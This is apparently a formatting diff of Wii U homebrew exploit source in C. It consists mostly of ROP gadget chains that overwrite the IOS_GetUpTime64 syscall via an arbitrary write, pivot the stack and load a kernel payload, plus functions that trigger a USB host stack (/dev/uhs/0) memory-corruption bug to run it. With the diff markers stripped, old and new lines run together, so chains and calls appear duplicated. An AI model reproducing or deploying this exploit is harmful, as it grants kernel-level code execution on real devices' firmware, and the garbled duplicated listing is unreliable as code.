0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x100
|
||||
0x0, // 0x104
|
||||
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x10C
|
||||
0x0, // 0x110
|
||||
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A00004, // 0x11C value: MOV R0, R4
|
||||
0x0, // 0x120
|
||||
0x10123a8b, // 0x124 POP {R3,R4,PC}
|
||||
0x1, // 0x128 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x12C
|
||||
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x134
|
||||
0x0, // 0x138
|
||||
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x140
|
||||
0x0, // 0x144
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x00000000, // 0x150 value: NOP
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x1AFFFFFD, // 0x150 value: BNE clean_loop
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A03004, // 0x184 value: MOV R3, R4
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE8BD4010, // 0x184 value: POP {R4,LR}
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
|
||||
0x0, // 0x1BC
|
||||
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
|
||||
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x1C8
|
||||
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x1D0
|
||||
0x0, // 0x1D4
|
||||
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
|
||||
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
|
||||
0x0, // 0x1E0
|
||||
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
ARM_CODE_BASE, // 0x1E8 our code destination address
|
||||
0x0, // 0x1EC
|
||||
0x0, // 0x1F0
|
||||
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x1F8
|
||||
sizeof(ios_kernel_bin), // 0x1FC our code size
|
||||
0x0, // 0x200
|
||||
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
|
||||
0x00140000, // 0x208 our code source location
|
||||
0x08131D04, // 0x20C KERNEL_MEMCPY address
|
||||
0x0, // 0x210
|
||||
0x0, // 0x214
|
||||
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
|
||||
0x0,
|
||||
0x0,
|
||||
0x101312D0,
|
||||
0x101236f3, // 0x00 POP {R1-R7,PC}
|
||||
0x0, // 0x04 arg
|
||||
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
|
||||
0x68, // 0x0C stacksize
|
||||
0x10101638, // 0x10
|
||||
0x0, // 0x14
|
||||
0x0, // 0x18
|
||||
0x0, // 0x1C
|
||||
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x30
|
||||
0x0, // 0x34
|
||||
IOS_CREATETHREAD, // 0x38
|
||||
0x1, // 0x3C
|
||||
0x2, // 0x40
|
||||
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE92D4010, // 0x4C value: PUSH {R4,LR}
|
||||
0x0, // 0x50
|
||||
0x10123a8b, // 0x54 POP {R3,R4,PC}
|
||||
0x1, // 0x58 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x5C
|
||||
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x64
|
||||
0x0, // 0x68
|
||||
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A04000, // 0x80 value: MOV R4, R0
|
||||
0x0, // 0x84
|
||||
0x10123a8b, // 0x88 POP {R3,R4,PC}
|
||||
0x1, // 0x8C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x90
|
||||
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xA4
|
||||
0x0, // 0xA8
|
||||
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
|
||||
0x0, // 0xB8
|
||||
0x10123a8b, // 0xBC POP {R3,R4,PC}
|
||||
0x1, // 0xC0 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xC4
|
||||
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0xCC
|
||||
0x0, // 0xD0
|
||||
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xD8
|
||||
0x0, // 0xDC
|
||||
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
|
||||
0x0, // 0xEC
|
||||
0x10123a8b, // 0xF0 POP {R3,R4,PC}
|
||||
0x1, // 0xF4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xF8
|
||||
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x100
|
||||
0x0, // 0x104
|
||||
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x10C
|
||||
0x0, // 0x110
|
||||
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A00004, // 0x11C value: MOV R0, R4
|
||||
0x0, // 0x120
|
||||
0x10123a8b, // 0x124 POP {R3,R4,PC}
|
||||
0x1, // 0x128 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x12C
|
||||
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x134
|
||||
0x0, // 0x138
|
||||
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x140
|
||||
0x0, // 0x144
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x00000000, // 0x150 value: NOP
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x1AFFFFFD, // 0x150 value: BNE clean_loop
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A03004, // 0x184 value: MOV R3, R4
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE8BD4010, // 0x184 value: POP {R4,LR}
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
|
||||
0x0, // 0x1BC
|
||||
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
|
||||
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x1C8
|
||||
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x1D0
|
||||
0x0, // 0x1D4
|
||||
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
|
||||
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
|
||||
0x0, // 0x1E0
|
||||
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
ARM_CODE_BASE, // 0x1E8 our code destination address
|
||||
0x0, // 0x1EC
|
||||
0x0, // 0x1F0
|
||||
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x1F8
|
||||
sizeof(ios_kernel_bin), // 0x1FC our code size
|
||||
0x0, // 0x200
|
||||
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
|
||||
0x00140000, // 0x208 our code source location
|
||||
0x08131D04, // 0x20C KERNEL_MEMCPY address
|
||||
0x0, // 0x210
|
||||
0x0, // 0x214
|
||||
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
|
||||
0x0,
|
||||
0x0,
|
||||
0x101312D0,
|
||||
};
|
||||
|
||||
static const int second_chain[] = {
|
||||
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
|
||||
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
|
||||
0x0, // 0x08
|
||||
0x0, // 0x0C
|
||||
0x101063db, // 0x10 POP {R1,R2,R5,PC}
|
||||
0x00130000, // 0x14 source
|
||||
sizeof(final_chain), // 0x18 length
|
||||
0x0, // 0x1C
|
||||
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x101236f3, // 0x2C POP {R1-R7,PC}
|
||||
0x0, // 0x30 arg
|
||||
0x101001DC, // 0x34 stackptr
|
||||
0x68, // 0x38 stacksize
|
||||
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x40
|
||||
0x0, // 0x44
|
||||
0x0, // 0x48
|
||||
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x50
|
||||
0x0, // 0x54
|
||||
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x5C
|
||||
0x0, // 0x60
|
||||
IOS_CREATETHREAD, // 0x64
|
||||
0x1, // 0x68 priority
|
||||
0x2, // 0x6C flags
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x101063db, // 0x78 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x7C
|
||||
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
|
||||
0x0, // 0x84
|
||||
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x0,
|
||||
0x00110000 - 0x44, // 0x8C
|
||||
0x00110010, // 0x90
|
||||
0x0, // 0x94
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x0, // 0xA0
|
||||
0x0, // 0xA4
|
||||
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
|
||||
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x1012EA68, // 0xAC stack pivot
|
||||
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
|
||||
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
|
||||
0x0, // 0x08
|
||||
0x0, // 0x0C
|
||||
0x101063db, // 0x10 POP {R1,R2,R5,PC}
|
||||
0x00130000, // 0x14 source
|
||||
sizeof(final_chain), // 0x18 length
|
||||
0x0, // 0x1C
|
||||
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x101236f3, // 0x2C POP {R1-R7,PC}
|
||||
0x0, // 0x30 arg
|
||||
0x101001DC, // 0x34 stackptr
|
||||
0x68, // 0x38 stacksize
|
||||
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x40
|
||||
0x0, // 0x44
|
||||
0x0, // 0x48
|
||||
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x50
|
||||
0x0, // 0x54
|
||||
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x5C
|
||||
0x0, // 0x60
|
||||
IOS_CREATETHREAD, // 0x64
|
||||
0x1, // 0x68 priority
|
||||
0x2, // 0x6C flags
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x101063db, // 0x78 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x7C
|
||||
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
|
||||
0x0, // 0x84
|
||||
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x0,
|
||||
0x00110000 - 0x44, // 0x8C
|
||||
0x00110010, // 0x90
|
||||
0x0, // 0x94
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x0, // 0xA0
|
||||
0x0, // 0xA4
|
||||
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
|
||||
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x1012EA68, // 0xAC stack pivot
|
||||
};
|
||||
|
||||
static void uhs_exploit_init(int dev_uhs_0_handle) {
|
||||
ayylmao[5] = 1;
|
||||
ayylmao[8] = 0x500000;
|
||||
|
||||
memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
|
||||
memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
|
||||
memcpy((char*)(0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin));
|
||||
memcpy((char *) (0xF4120000), second_chain, sizeof(second_chain));
|
||||
memcpy((char *) (0xF4130000), final_chain, sizeof(final_chain));
|
||||
memcpy((char *) (0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin));
|
||||
|
||||
payload_info_t *payloads = (payload_info_t*)0xF4148000;
|
||||
payload_info_t *payloads = (payload_info_t *) 0xF4148000;
|
||||
payloads->size = sizeof(ios_usb_bin);
|
||||
memcpy(payloads->data, ios_usb_bin, payloads->size);
|
||||
|
||||
@ -319,24 +320,24 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
|
||||
pretend_root_hub[78] = 0;
|
||||
|
||||
DCStoreRange(pretend_root_hub + 33, 200);
|
||||
DCStoreRange((void*)0xF4120000, sizeof(second_chain));
|
||||
DCStoreRange((void*)0xF4130000, sizeof(final_chain));
|
||||
DCStoreRange((void*)0xF4140000, sizeof(ios_kernel_bin));
|
||||
DCStoreRange((void*)0xF4148000, ((uint32_t)0xF4180000) - 0xF4148000);
|
||||
DCStoreRange((void *) 0xF4120000, sizeof(second_chain));
|
||||
DCStoreRange((void *) 0xF4130000, sizeof(final_chain));
|
||||
DCStoreRange((void *) 0xF4140000, sizeof(ios_kernel_bin));
|
||||
DCStoreRange((void *) 0xF4148000, ((uint32_t) 0xF4180000) - 0xF4148000);
|
||||
}
|
||||
|
||||
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
|
||||
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
|
||||
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
|
||||
OSSleepTicks(0x200000); //! Improves stability
|
||||
int request_buffer[] = { -(0xBEA2C), val }; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
|
||||
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
|
||||
int output_buffer[32];
|
||||
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
|
||||
}
|
||||
|
||||
int ExecuteIOSExploit() {
|
||||
int iosuhaxFd = IOS_Open("/dev/iosuhax", 0);
|
||||
if(iosuhaxFd >= 0) {
|
||||
if (iosuhaxFd >= 0) {
|
||||
int dummy = 0;
|
||||
|
||||
IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
|
||||
@ -349,7 +350,7 @@ int ExecuteIOSExploit() {
|
||||
|
||||
//! execute exploit
|
||||
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);
|
||||
if(dev_uhs_0_handle < 0) {
|
||||
if (dev_uhs_0_handle < 0) {
|
||||
return dev_uhs_0_handle;
|
||||
}
|
||||
|
||||
|
@ -27,6 +27,7 @@
|
||||
#include "ios_exploit.h"
|
||||
|
||||
#include "gx2sploit.h"
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
@ -37,20 +38,20 @@ extern "C" {
|
||||
|
||||
bool CheckRunning() {
|
||||
|
||||
switch(ProcUIProcessMessages(true)) {
|
||||
case PROCUI_STATUS_EXITING: {
|
||||
return false;
|
||||
}
|
||||
case PROCUI_STATUS_RELEASE_FOREGROUND: {
|
||||
ProcUIDrawDoneRelease();
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_FOREGROUND: {
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_BACKGROUND:
|
||||
default:
|
||||
break;
|
||||
switch (ProcUIProcessMessages(true)) {
|
||||
case PROCUI_STATUS_EXITING: {
|
||||
return false;
|
||||
}
|
||||
case PROCUI_STATUS_RELEASE_FOREGROUND: {
|
||||
ProcUIDrawDoneRelease();
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_FOREGROUND: {
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_BACKGROUND:
|
||||
default:
|
||||
break;
|
||||
}
|
||||
